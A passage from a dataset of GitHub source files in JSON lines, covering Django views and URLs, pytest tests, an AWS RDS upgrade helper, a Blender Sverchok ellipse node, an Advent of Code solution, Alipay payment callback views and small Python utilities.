= request.POST.get(\"content\"),image = request.FILES.get(\"image\"))\n post.save()\n return redirect(\"content:post_detail\",post.id)\n else:\n return render(request,\"content/post.html\")\n\ndef savePost(request):\n if request.method == \"POST\":\n data = json.loads(request.body)\n post = Post.objects.get(id = data[\"post_id\"])\n post.saved_user.add(request.user)\n post.save()\n return 
JsonResponse({\"saved\" : request.user.saved_posts.count()},status = 200)\n\ndef commentCreate(request,post_id):\n if request.method == \"POST\":\n post = Post.objects.get(id = post_id)\n comment = Comment(author = request.user,content = request.POST.get(\"content\"),post = post)\n comment.save()\n return redirect(\"content:post_detail\",post.id)\n\n","repo_name":"Jeeeyoungkim/cloud-programming","sub_path":"content/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72338787361","text":"from unittest.mock import patch, MagicMock\n\nimport pytest\nfrom algernon import ajson\n\nfrom toll_booth import handler\n\n\n@pytest.mark.tasks\n@pytest.mark.usefixtures('unit_environment')\nclass TestTasks:\n @pytest.mark.mark_push\n def test_mark_push_complete(self, mark_push_event, mock_context):\n with patch('toll_booth.tasks.mark_push.boto3.resource') as mock_dynamo:\n mock_resource = MagicMock()\n mock_table = MagicMock()\n mock_resource.Table = mock_table\n mock_dynamo.return_value = mock_resource\n event = {'task_name': 'mark_push_complete', 'task_kwargs': mark_push_event}\n results = handler(event, mock_context)\n assert results is None\n assert mock_table.update_item.called\n\n @pytest.mark.tasks_generate_source_vertex\n def test_generate_source_vertex(self, source_vertex_task_integration_event, mock_context, mocks):\n results = handler(source_vertex_task_integration_event, mock_context)\n assert results\n parsed_results = ajson.loads(results)\n expected_keys = ['source_vertex', 'schema', 'schema_entry', 'extracted_data']\n for key_value in expected_keys:\n assert key_value in parsed_results\n generated_vertex_data = parsed_results['source_vertex']\n assert generated_vertex_data.vertex_properties\n assert mocks['bullhorn'].called\n assert mocks['gql'].called\n\n @pytest.mark.tasks_generate_potential_connections\n def test_generate_potential_connections(self, potential_connections_unit_event, mock_context, mocks):\n results = handler(potential_connections_unit_event, mock_context)\n assert results\n assert mocks['bullhorn'].called\n\n @pytest.mark.tasks_check_for_existing_vertexes\n def test_check_for_existing_vertexes(self, find_existing_vertexes, mock_context, mocks):\n results = handler(find_existing_vertexes, mock_context)\n assert results\n assert mocks['bullhorn'].called\n\n @pytest.mark.tasks_generate_potential_edge\n def test_generate_potential_edge(self, generate_edge_integration_event, mock_context):\n results = handler(generate_edge_integration_event, mock_context)\n assert results\n","repo_name":"AlgernonSolutions/eventful_leech","sub_path":"tests/unit/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30534707812","text":"import sys\nimport time\nfrom threading import Thread\n\n\nclass ExceptionCatchingThread(Thread):\n \"\"\"\n The interface provided by ExceptionCatchingThread is identical to that of\n threading.Thread, however, if an exception occurs in the thread\n the error will be caught and printed to stderr.\n \"\"\"\n\n def __init__(self, **kwargs):\n super(ExceptionCatchingThread, self).__init__(**kwargs)\n self._real_run = self.run\n self.run = self._wrap_run\n\n def _wrap_run(self):\n try:\n self._real_run()\n except Exception as exc:\n print(exc, file=sys.stderr)\n\n\nclass RDSWaiter:\n \"\"\"\n 
Context manager that provides the waiting functionality when\n modifying/upgrading an RDSInstance\n\n >>> from models import rds_client\n >>> from moto import mock_rds2; mock_rds2().start()\n >>> from test_data.utils import make_rds_instance\n >>> make_rds_instance()\n RDSInstance id: test-rds-id, status: available, engine: postgres, engine_version: 9.3.14\n >>> with RDSWaiter(rds_client, \"test-rds-id\", \"9.4.18\", sleep_time=0):\n ... print(\"Upgrading soon!\")\n Polling: test-rds-id for availability\n Status of: test-rds-id is: available\n Upgrading soon!\n Upgrading test-rds-id to: 9.4.18\n Polling: test-rds-id for availability\n Status of: test-rds-id is: available\n Successfully upgraded test-rds-id to: 9.4.18\n \"\"\"\n\n def __init__(self, client, db_instance_id, pg_engine_version, sleep_time=60):\n self.engine_version = pg_engine_version\n self.instance_id = db_instance_id\n self.sleep_time = sleep_time\n self.client = client\n self.rds_waiter = self.client.get_waiter(\"db_instance_available\")\n\n _operation_method = self.rds_waiter._operation_method\n\n def wait_with_status_reporting(**kwargs):\n print(\"Polling: {} for availability\".format(self.instance_id))\n response = _operation_method(**kwargs)\n print(\n \"Status of: {} is: {}\".format(\n self.instance_id, response[\"DBInstances\"][0][\"DBInstanceStatus\"]\n )\n )\n return response\n\n self.rds_waiter._operation_method = wait_with_status_reporting\n\n def __enter__(self):\n self.rds_waiter.wait(DBInstanceIdentifier=self.instance_id)\n\n def __exit__(self, type, value, traceback):\n print(\"Upgrading {} to: {}\".format(self.instance_id, self.engine_version))\n time.sleep(self.sleep_time)\n self.rds_waiter.wait(DBInstanceIdentifier=self.instance_id)\n print(\n \"Successfully upgraded {} to: {}\".format(\n self.instance_id, self.engine_version\n )\n )\n","repo_name":"scottx611x/rds_auto_upgrader","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"37778178540","text":"\nfrom math import sqrt\n\nfrom mathutils import Matrix\nimport bpy\nfrom bpy.props import FloatProperty, EnumProperty, BoolProperty\n\nfrom sverchok.node_tree import SverchCustomTreeNode\nfrom sverchok.data_structure import updateNode, zip_long_repeat, ensure_nesting_level\n\nfrom sverchok.utils.curve import SvEllipse\n\nclass SvEllipseCurveNode(SverchCustomTreeNode, bpy.types.Node):\n \"\"\"\n Triggers: Ellipse Curve\n Tooltip: Generate ellipse curve\n \"\"\"\n bl_idname = 'SvEllipseCurveNode'\n bl_label = 'Ellipse (Curve)'\n sv_icon = 'SV_ELLIPSE'\n\n mode_items = [(\"AB\", \"a b\", \"Major Radius / Minor Radius\", 1),\n (\"AE\", \"a e\", \"Major Radius / Eccentricity\", 2),\n (\"AC\", \"a c\", \"Major Radius / Focal Length\", 3)]\n\n centering_items = [(SvEllipse.F1, \"F1\", \"Ellipse focal point 1\", 1),\n (SvEllipse.CENTER, \"C\", \"Ellipse center point\", 2),\n (SvEllipse.F2, \"F2\", \"Ellipse focal point 2\", 3)]\n\n def update_mode(self, context):\n ''' Update the ellipse parameters of the new mode based on previous mode ones'''\n\n if self.mode == self.last_mode:\n return\n\n # from to\n switch_state = (self.last_mode, self.mode)\n\n a = self.major_radius\n e = self.eccentricity\n c = self.focal_length\n\n self.updating = True\n\n if switch_state == (\"AE\", \"AB\"):\n self.minor_radius = a * sqrt(1 - e * e)\n\n elif switch_state == (\"AC\", \"AB\"):\n c = min(a, c)\n self.minor_radius = sqrt(a * a - c * 
c)\n\n elif switch_state == (\"AB\", \"AE\"):\n b = min(a, self.minor_radius)\n self.eccentricity = sqrt(1 - (b * b) / (a * a))\n\n elif switch_state == (\"AC\", \"AE\"):\n self.eccentricity = c / a\n\n elif switch_state == (\"AB\", \"AC\"):\n b = min(a, self.minor_radius)\n self.focal_length = sqrt(a * a - b * b)\n\n elif switch_state == (\"AE\", \"AC\"):\n self.focal_length = a * e\n\n self.updating = False\n\n self.last_mode = self.mode\n self.update_sockets()\n updateNode(self, context)\n\n def update_ellipse(self, context):\n if self.updating:\n return\n\n updateNode(self, context)\n\n def update_sockets(self):\n if self.mode == \"AB\":\n socket2 = self.inputs[1]\n socket2.replace_socket(\"SvStringsSocket\", \"Minor Radius\").prop_name = \"minor_radius\"\n elif self.mode == \"AE\":\n socket2 = self.inputs[1]\n socket2.replace_socket(\"SvStringsSocket\", \"Eccentricity\").prop_name = \"eccentricity\"\n else: # AC\n socket2 = self.inputs[1]\n socket2.replace_socket(\"SvStringsSocket\", \"Focal Length\").prop_name = \"focal_length\"\n\n mode: EnumProperty(\n name=\"Mode\", items=mode_items,\n description=\"Ellipse definition mode\",\n default=\"AB\", update=update_mode)\n\n last_mode: EnumProperty(\n name=\"Mode\", items=mode_items,\n description=\"Ellipse definition last mode\",\n default=\"AB\")\n\n centering: EnumProperty(\n name=\"Centering\", items=centering_items,\n description=\"Center the ellipse around F1, C or F2\",\n default=SvEllipse.CENTER,\n update=updateNode)\n\n major_radius: FloatProperty(\n name='Major Radius', description='Ellipse major radius (semiaxis)',\n default=1.0, min=0.0, update=update_ellipse)\n\n minor_radius: FloatProperty(\n name='Minor Radius', description='Ellipse minor radius (semiaxis)',\n default=0.8, min=0.0, update=update_ellipse)\n\n eccentricity: FloatProperty(\n name='Eccentricity', description='Ellipse eccentricity',\n default=0.6, min=0.0, max=1.0, update=update_ellipse)\n\n focal_length: FloatProperty(\n name='Focal Length', description='Ellipse focal length. 
Distance from ellipse’s center to it’s focal points',\n default=0.6, min=0.0, update=update_ellipse)\n\n updating: BoolProperty(default=False) # used for disabling update callback\n\n def draw_buttons(self, context, layout):\n col = layout.column(align=True)\n row = col.row(align=True)\n row.prop(self, \"mode\", expand=True)\n row = col.row(align=True)\n row.prop(self, \"centering\", expand=True)\n\n def sv_init(self, context):\n self.width = 160\n self.inputs.new('SvStringsSocket', \"Major Radius\").prop_name = \"major_radius\" # 0\n self.inputs.new('SvStringsSocket', \"Minor Radius\").prop_name = \"minor_radius\" # 1\n self.inputs.new('SvMatrixSocket', \"Matrix\") # 2\n\n self.outputs.new('SvCurveSocket', \"Ellipse\")\n self.outputs.new('SvVerticesSocket', \"F1\")\n self.outputs.new('SvVerticesSocket', \"F2\")\n\n def process(self):\n outputs = self.outputs\n # return if no outputs are connected\n if not any(s.is_linked for s in outputs):\n return\n\n major_radius_s = self.inputs['Major Radius'].sv_get()\n input2_s = self.inputs[1].sv_get()# minor radius, eccentricity or focal length\n matrices_s = self.inputs['Matrix'].sv_get(default = [[Matrix()]])\n\n major_radius_s = ensure_nesting_level(major_radius_s, 2)\n input2_s = ensure_nesting_level(input2_s, 2)\n matrices_s = ensure_nesting_level(matrices_s, 2, data_types=(Matrix,))\n\n curves_out = []\n f1_out = []\n f2_out = []\n for major_radius_i, input2_i, matrices_i in zip_long_repeat(major_radius_s, input2_s, matrices_s):\n new_curves = []\n new_f1 = []\n new_f2 = []\n for major_radius, input2, matrix in zip_long_repeat(major_radius_i, input2_i, matrices_i):\n if self.mode == 'AB':\n minor_radius = input2\n elif self.mode == 'AE':\n e = input2\n minor_radius = major_radius * sqrt(1 - e*e)\n else: # AC\n c = input2\n a = major_radius\n minor_radius = sqrt(a*a - c*c)\n\n ellipse = SvEllipse(matrix, major_radius, minor_radius, center_type = self.centering)\n f1, f2 = ellipse.to_equation().focal_points()\n new_f1.append(f1)\n new_f2.append(f2)\n new_curves.append(ellipse)\n\n curves_out.append(new_curves)\n f1_out.append(new_f1)\n f2_out.append(new_f2)\n\n self.outputs['Ellipse'].sv_set(curves_out)\n self.outputs['F1'].sv_set(f1_out)\n self.outputs['F2'].sv_set(f2_out)\n\ndef register():\n bpy.utils.register_class(SvEllipseCurveNode)\n\ndef unregister():\n bpy.utils.unregister_class(SvEllipseCurveNode)\n\n","repo_name":"nortikin/sverchok","sub_path":"old_nodes/ellipse_curve.py","file_name":"ellipse_curve.py","file_ext":"py","file_size_in_byte":6743,"program_lang":"python","lang":"en","doc_type":"code","stars":2098,"dataset":"github-code","pt":"54"} +{"seq_id":"16130667161","text":"\"\"\"mySpartaSns URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom . 
import views # 현재 폴더에서 views 파일 가져온다.\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('test/', views.base_response, name='first_test'), # test/ url로 views파일의 base_response 함수와 연결 시켜줌\n path('first/', views.first_view, name='first_view'),\n path('',include('user.urls')), # user의 url과 mySparta의 url 을 연결해줌\n path('',include('tweet.urls')), # user.urls 는 일치하는 url이 없고 tweet.urls가 응답\n]\n","repo_name":"mankic/mySpartaSNS","sub_path":"mySpartaSns/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7097528731","text":"import os\r\n\r\nIMG_BASE_PATH='imgs/'\r\nelementFloderList=['aether', 'air', 'darkness', 'death', 'entropy', 'fire', 'earth',\r\n 'gravity','life', 'ligth', 'time', 'water', 'other']\r\nCARD_FILE='cards.txt'\r\nIMG_NAME_COL=0\r\n\r\ncardList=[]\r\n##get card name by img's name\r\nchildFiles=os.listdir(IMG_BASE_PATH)\r\nprint(childFiles)\r\nfor i in childFiles:\r\n p=IMG_BASE_PATH+i\r\n if os.path.isdir(p) and i in elementFloderList:\r\n cardList+=os.listdir(p)\r\n\r\n##print(cardList)\r\n\r\n\r\nexist_cardList=[]\r\n##get card.txt file exist name\r\nfile=open(CARD_FILE, 'r')\r\nfile.readline()\r\nwhile True:\r\n ss=file.readline()\r\n ss=ss.strip('\\n')\r\n if ss=='':\r\n break\r\n arr=ss.split('\\t')\r\n exist_cardList.append(arr[IMG_NAME_COL])\r\n\r\nfile.close()\r\n##print(exist_cardList)\r\n\r\n\r\n## rewrite the file append\r\nfile=open(CARD_FILE, 'a')\r\nfor name in cardList:\r\n if name not in exist_cardList:\r\n file.write(name+'\\n')\r\n ##print('')\r\n\r\nfile.close()\r\n\r\n\r\n\r\n\r\n","repo_name":"ppppdm/element_the_game","sub_path":"reloadImgName.py","file_name":"reloadImgName.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15219687896","text":"from django.contrib.gis.db import models\nfrom apps.common.models import AbstractFeature, AbstractObservation\n\n\nclass SamplingFeature(AbstractFeature):\n geometry = models.PointField(\n help_text=\"Spatial information about feature.\",\n srid=3857\n )\n\n\nclass Observation(AbstractObservation):\n feature_of_interest = models.ForeignKey(\n SamplingFeature,\n help_text=\"Watercourse station where the observation was taken.\",\n related_name='observations',\n editable=False,\n on_delete=models.DO_NOTHING\n )\n\n class Meta:\n get_latest_by = 'phenomenon_time_range'\n ordering = ['-phenomenon_time_range', 'feature_of_interest', 'procedure',\n 'observed_property']\n # unique_together see migration 0005 and 0006, index ozp_observation_uniq\n\n","repo_name":"gis4dis/poster","sub_path":"apps/processing/huaihe/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"23986228430","text":"import json\n\nclass Worker(object):\n def __init__(self, w_id, name=\"\", skill_levels={}):\n self.id=w_id\n self.name=name\n self.skill_levels=skill_levels\n\n\nclass Job(object):\n def __init__(self, j_id, name=\"\", std_time=0.0, need_machine=None, need_skill=None, count=1):\n self.id=j_id\n self.name=name\n self.std_time=std_time\n self.need_machine=need_machine\n self.need_skill=need_skill\n self.count=count\n\n\nclass Machine(object):\n def __init__(self, name):\n self.name=name\n self.job_list=[]\n\n def relate_to_job(self, job):\n self.job_list.append(job)\n\n\nclass 
Pipeline(object):\n def __init__(self, name=\"\"):\n self.name=name\n\n self.components=[]\n\n self.machines={}\n\n def __str__(self):\n return str(self.to_dict())\n\n def __repr__(self):\n self.__str__()\n\n def append_components(self, component):\n self.components.append(component)\n\n def from_dict(self, pl):\n self.name=pl[\"name\"]\n for component in pl[\"components\"]:\n component_id=component[\"id\"]\n new_component=Component(component_id, component[\"name\"])\n for group in component[\"groups\"]:\n group_id=group[\"id\"]\n new_group=Group(group_id, group[\"name\"])\n for job in group[\"jobs\"]:\n new_job=Job(job[\"id\"],job[\"name\"],job[\"std_time\"],job[\"need_machine\"],job[\"need_skill\"],job[\"count\"])\n if job[\"need_machine\"] not in self.machines:\n self.machines[job[\"need_machine\"]]=Machine(job[\"need_machine\"])\n self.machines[job[\"need_machine\"]].relate_to_job(job)\n new_group.append_job(new_job)\n new_component.append_group(new_group)\n self.append_components(new_component)\n\n\n def to_dict(self):\n pl={\n \"name\":self.name,\n \"components\":[]\n }\n for component in self.components:\n component_dic={\n \"id\":component.id,\n \"name\":component.name,\n \"groups\":[]\n }\n for group in component.groups:\n group_dic={\n \"id\":group.id,\n \"name\":group.name,\n \"jobs\":[]\n }\n for job in group.jobs:\n job_dic={\n \"id\":job.id,\n \"name\":job.name,\n \"count\":job.count,\n \"std_time\":job.std_time,\n \"need_machine\":job.need_machine,\n \"need_skill\":job.need_skill\n }\n group_dic[\"jobs\"].append(job_dic)\n component_dic[\"groups\"].append(group_dic)\n pl[\"components\"].append(component_dic)\n return pl\n\n def to_json(self):\n return json.dumps(self.to_dict(), ensure_ascii=False)\n\n def to_table(self):\n pass\n\n\nclass Component(object):\n def __init__(self, c_id, name, groups=[]):\n self.id=c_id\n self.name=name\n self.groups=groups\n \n def append_group(self, group):\n self.groups.append(group)\n\n\nclass Group(object):\n def __init__(self, g_id, name, jobs=[]):\n self.id=g_id\n self.name=name\n self.jobs=jobs\n \n def append_job(self, job):\n self.jobs.append(job)\n\n \t\n \n\nif __name__==\"__main__\":\n with open(\"pipeline_sample.json\", \"r\") as fp:\n pl_dic=json.load(fp)\n pl=Pipeline(pl_dic[\"name\"])\n pl.from_dict(pl_dic)\n print(pl)","repo_name":"Akaisorani/Pipeline-line-balancing","sub_path":"objects_notused.py","file_name":"objects_notused.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31573567045","text":"#!/usr/bin/env python3\n\"\"\"Template for Advent of Code solution in Python.\n\nUsage: ./solution.py 1|2 FILE\n\n\"\"\"\n\nfrom __future__ import annotations\n\nimport re\nimport sys\nfrom argparse import ArgumentParser\nfrom collections import deque\nfrom dataclasses import dataclass\nfrom pathlib import Path\n\nverbose = False\n\n\n@dataclass\nclass Instruction:\n quantity: int\n source: int\n destination: int\n\n @classmethod\n def load(cls, value: str) -> Instruction:\n match = re.match(r\"^move (\\d+) from (\\d) to (\\d)\", value)\n return Instruction(\n quantity=int(match[1]),\n source=int(match[2]),\n destination=int(match[3]),\n )\n\n\n@dataclass\nclass SupplyYard:\n stacks: dict[int, deque[str]]\n\n def process1(self, instruction: Instruction):\n for i in range(instruction.quantity):\n crate = self.stacks[instruction.source].pop()\n self.stacks[instruction.destination].append(crate)\n\n def process2(self, instruction: 
Instruction):\n crates = []\n for i in range(instruction.quantity):\n crates.append(self.stacks[instruction.source].pop())\n self.stacks[instruction.destination].extend(reversed(crates))\n\n def top_row(self) -> str:\n return \"\".join(stack[-1] for stack in self.stacks.values())\n\n @classmethod\n def load(cls, value: str) -> SupplyYard:\n lines = value.splitlines()\n stack_labels = [int(label) for label in lines[-1].split()]\n stacks = {label: deque() for label in stack_labels}\n\n for line in reversed(lines[:-1]):\n for label, stack in stacks.items():\n index = 1 + 4 * (label - 1)\n try:\n crate = line[index].strip()\n except IndexError:\n continue\n if crate:\n stack.append(crate)\n return SupplyYard(stacks)\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument(\"part\", type=int)\n parser.add_argument(\"filename\")\n parser.add_argument(\"--verbose\", \"-v\", action=\"store_true\")\n\n global verbose\n args = parser.parse_args()\n filename = args.filename\n if args.verbose:\n verbose = True\n\n if args.part == 1:\n part1(filename)\n elif args.part == 2:\n part2(filename)\n else:\n return f\"Invalid 'part' specified: {args.part}\"\n\n\ndef part1(filename):\n supply_yard, instructions = read_file(filename)\n if verbose:\n print(supply_yard, instructions)\n\n for instruction in instructions:\n supply_yard.process1(instruction)\n\n print(supply_yard.top_row())\n\n\ndef part2(filename):\n supply_yard, instructions = read_file(filename)\n for instruction in instructions:\n supply_yard.process2(instruction)\n\n print(supply_yard.top_row())\n\n\ndef read_file(filename) -> tuple[SupplyYard, list[Instruction]]:\n data = Path(filename).read_text()\n stack_data = \"\"\n process_instructions = False\n instructions = []\n supply_yard = None\n\n for line in data.splitlines(keepends=True):\n if line.strip() == \"\":\n process_instructions = True\n supply_yard = SupplyYard.load(stack_data)\n continue\n elif not process_instructions:\n stack_data += line\n continue\n else:\n instructions.append(Instruction.load(line.strip()))\n\n return supply_yard, instructions\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"smsearcy/advent-of-code","sub_path":"2022/day05.py","file_name":"day05.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16524278720","text":"\"\"\"Common interfaces for algorithms\"\"\"\n\nfrom abc import ABC, abstractmethod\nfrom typing import Callable\n\nfrom torch import Tensor\n\n\nclass IInterpolator(ABC):\n \"\"\"Interpolates/extrapolates values on regular grid in voxel coordinates\"\"\"\n\n @abstractmethod\n def __call__(self, volume: Tensor, coordinates: Tensor) -> Tensor:\n \"\"\"Interpolate\n\n Args:\n volume: Tensor with shape (batch_size, *channel_dims, dim_1, ..., dim_{n_dims})\n coordinates: Tensor with shape (batch_size, n_dims, *target_shape)\n\n Returns: Tensor with shape (batch_size, *channel_dims, *target_shape)\n \"\"\"\n\n\nclass IFixedPointSolver(ABC):\n \"\"\"Interface for fixed point solvers\"\"\"\n\n @abstractmethod\n def solve(\n self,\n fixed_point_function: Callable[[Tensor], Tensor],\n initial_value: Tensor,\n ) -> Tensor:\n \"\"\"Solve fixed point problem\n\n Args:\n fixed_point_function: Function to be iterated\n initial_value: Initial iteration value\n\n Returns: Solution of the fixed point iteration\n \"\"\"\n\n\nclass IFixedPointStopCriterion(ABC):\n \"\"\"Defines stopping criterion for fixed point iteration\"\"\"\n\n 
@abstractmethod\n def should_stop_after(\n self, previous_iteration: Tensor, current_iteration: Tensor, iteration_to_end: int\n ) -> bool:\n \"\"\"Return whether iterating should be stopped at end of an iteration\n\n After initial guess iteration == 0\n \"\"\"\n\n @abstractmethod\n def should_stop_before(self, iteration_to_start: int) -> bool:\n \"\"\"Return whether iterating should be continued at beginning of an iteration\n\n After initial guess iteration == 0\n \"\"\"\n","repo_name":"honkamj/SITReg","sub_path":"src/algorithm/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71784280802","text":"from rest_framework.views import APIView\nfrom alipay import AliPay\nfrom django.conf import settings\nfrom order.models import Order\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom datetime import datetime\nfrom coupon.models import UserCoupon\nfrom django.db import transaction\nfrom users.models import UserCourse\nfrom courses.models import CourseExpire\nfrom users.models import User\nimport logging\n\nlog = logging.getLogger(\"django\")\n\n\nclass AlipayAPIView(APIView):\n def post(self, request, order_number):\n \"\"\"生成支付宝支付链接的地址\"\"\"\n # 接受订单信息\n try:\n # order_status=0 表示未支付宝\n order = Order.objects.get(order_number=order_number, order_status=0)\n except Order.DoesNotExist:\n return Response({\"message\": \"对不起当前订单不存在或者已经支付了!\"}, status=status.HTTP_400_BAD_REQUEST)\n\n # 创建支付宝的sdk对象\n alipay = AliPay(\n appid=settings.ALIPAY_CONFIG[\"appid\"],\n app_notify_url=settings.ALIPAY_CONFIG[\"app_notify_url\"], # 默认回调url\n app_private_key_path=settings.ALIPAY_CONFIG[\"app_private_key_path\"],\n # 支付宝的公钥,验证支付宝回传消息使用,不是你自己的公钥,\n alipay_public_key_path=settings.ALIPAY_CONFIG[\"alipay_public_key_path\"],\n sign_type=settings.ALIPAY_CONFIG[\"sign_type\"], # RSA 或者 RSA2\n debug=settings.ALIPAY_CONFIG[\"debug\"], # 默认False\n )\n\n # 电脑网站支付,需要跳转到https://openapi.alipay.com/gateway.do? + order_string\n order_string = alipay.api_alipay_trade_page_pay(\n out_trade_no=order.order_number, # 订单号\n total_amount=float(order.real_price), # 订单总金额[单位:元]\n subject=order.order_title, # 订单标题\n return_url=settings.ALIPAY_CONFIG[\"return_url\"], # 同步通知地址\n notify_url=settings.ALIPAY_CONFIG[\"notify_url\"], # 异步通知地址\n )\n\n pay_url = settings.ALIPAY_CONFIG[\"gateway_url\"] + order_string\n\n return Response({\"pay_url\": pay_url})\n\n\nclass AlipayResultAPIView(APIView):\n \"\"\"\n 支付宝支付结果的通知处理\n \"\"\"\n\n def get(self, request):\n # for rest_framework users\n data = request.query_params.dict()\n return self.result(data)\n\n def post(self, request):\n \"\"\"处理异步通知结果\n 1. 线下开发是不起作用的,因为外网的支付宝服务器无法访问我们的局域网地址\n 2. 
如果使用了代理服务器,通过代理方式提供对外访问时,异步通知会在转发请求的过程中存在丢失数据的可能\n \"\"\"\n data = request.data.dict()\n return self.result(data)\n\n def result(self, data):\n signature = data.pop(\"sign\")\n\n # 创建支付宝的sdk对象\n alipay = AliPay(\n appid=settings.ALIPAY_CONFIG[\"appid\"],\n app_notify_url=settings.ALIPAY_CONFIG[\"app_notify_url\"], # 默认回调url\n app_private_key_path=settings.ALIPAY_CONFIG[\"app_private_key_path\"],\n # 支付宝的公钥,验证支付宝回传消息使用,不是你自己的公钥,\n alipay_public_key_path=settings.ALIPAY_CONFIG[\"alipay_public_key_path\"],\n sign_type=settings.ALIPAY_CONFIG[\"sign_type\"], # RSA 或者 RSA2\n debug=settings.ALIPAY_CONFIG[\"debug\"], # 默认False\n )\n\n # verification\n success = alipay.verify(data, signature)\n if success:\n\n # 修改订单状态\n out_trade_no = data.get(\"out_trade_no\")\n try:\n order = Order.objects.get(order_number=out_trade_no, order_status=0)\n except Order.DoesNotExist:\n return Response({\"message\": \"对不起当前订单不存在或者已经支付了!\"}, status=status.HTTP_400_BAD_REQUEST)\n\n with transaction.atomic():\n # 记录事务的回滚点\n save_id = transaction.savepoint()\n\n order.order_status = 1\n order.pay_time = datetime.now()\n order.save()\n\n # 如果订单中使用了优惠券,则优惠券的使用状态要调整\n if order.coupon > 0:\n user_coupon_id = order.coupon\n try:\n user_coupon = UserCoupon.objects.get(pk=user_coupon_id, is_use=False)\n user_coupon.is_use = True\n user_coupon.save()\n\n except UserCoupon.DoesNotExist:\n log.error(\"生成订单支付结果有误!优惠券发生异常!\")\n transaction.savepoint_rollback(save_id)\n\n # 如果用户使用了积分,则扣除相应积分\n user = User.objects.get(pk=order.user_id)\n if order.credit > 0:\n user.credit = user.credit - order.credit\n if user.credit > 0:\n user.save()\n else:\n log.error(\"生成订单支付结果有误!积分计算有误!\")\n transaction.savepoint_rollback(save_id)\n\n # 记录用户购买商品的记录信息\n order_course = order.order_courses.all()\n course_list = []\n for item in order_course:\n\n # 获取本次购买课程的有效期选项\n try:\n \"\"\"有效期选项\"\"\"\n course_expire = CourseExpire.objects.get(expire_time=item.expire, course=item.course)\n expire = course_expire.expire_time\n timer = expire * 24 * 60 * 60\n out_timestamp = order.pay_time.timestamp() + timer\n # 把数值时间戳转变成日期对象\n out_time = datetime.fromtimestamp(out_timestamp)\n\n except CourseExpire.DoesNotExist:\n \"\"\"永久有效,默认过期时间200年后\"\"\"\n out_time = \"2199-01-01 00:00:00\"\n\n \"\"\"\n 判断之前当前用户是否购买过同一商品,如果购买了同一商品,则在前面的过期时间基础上增加时间\n 过期时间,也需要判断,如果现在已经过期了,则购买完课程以后的过期时间 = 现在 + 有效期\n 如果现在没有过期,则购买完课程以后的过期时间 = 过期时间 + 有效期\n\n 购买完成,我们扣除了积分,但是我们也要针对本次消费的积分进行积分流水记录! Credit\n \"\"\"\n UserCourse.objects.create(\n user=user,\n course=item.course,\n trade_no=data.get(\"trade_no\"),\n buy_type=1,\n pay_time=order.pay_time,\n out_time=out_time,\n orders=0,\n\n )\n course_list.append({\n \"id\": item.course.id,\n \"name\": item.course.name\n })\n\n data = {\n \"order_number\": order.order_number,\n \"pay_time\": order.pay_time,\n \"real_price\": order.real_price,\n \"user_credit\": user.credit,\n \"course_list\": course_list,\n }\n\n return Response(data)\n\n else:\n return Response({\"message\": \"支付失败!\"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n","repo_name":"jikezc/luffy","sub_path":"luffyapi/luffyapi/apps/payments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7870,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41879610713","text":"import libreria\r\n#1. 
Implementacion de submenu\r\ndef agregarCostototal():\r\n #1 agregamos el costo fijo\r\n #2 agregamos el costo variable\r\n #3 hallamos el costo total\r\n costo_fijo=libreria.pedir_numero(\"ingrese costo fijo\",3,30)\r\n costo_variable=libreria.pedir_numero(\"ingrese costo variable\",2,50)\r\n print(\"ingrese el costo total\", costo_fijo+costo_variable)\r\ndef agregarCostofijo():\r\n #1 agregar el costo total\r\n #2 agregar el costo variable\r\n #3 calcular el costo fijo\r\n costo_total=libreria.pedir_numero(\"ingrese costo total\",60,120)\r\n costo_variable=libreria.pedir_numero(\"ingrese costo variable\",2,45)\r\n print(\"ingrese el costo fijo \",costo_total-costo_variable )\r\n# Menu de comandos\r\nopc=0\r\nmax=3\r\nwhile(opc!= max):\r\n print(\"############### MENU ##############\")\r\n print(\"#1. agregar costo total\")\r\n print(\"#2. agregar costo fijo\")\r\n print(\"#3. Salir \")\r\n #2. Eleccion de la opcion menu\r\n opc=libreria.pedir_numero(\"Ingreso la opcion:\", 1, 3)\r\n #3. Mapeo de las opciones\r\n if 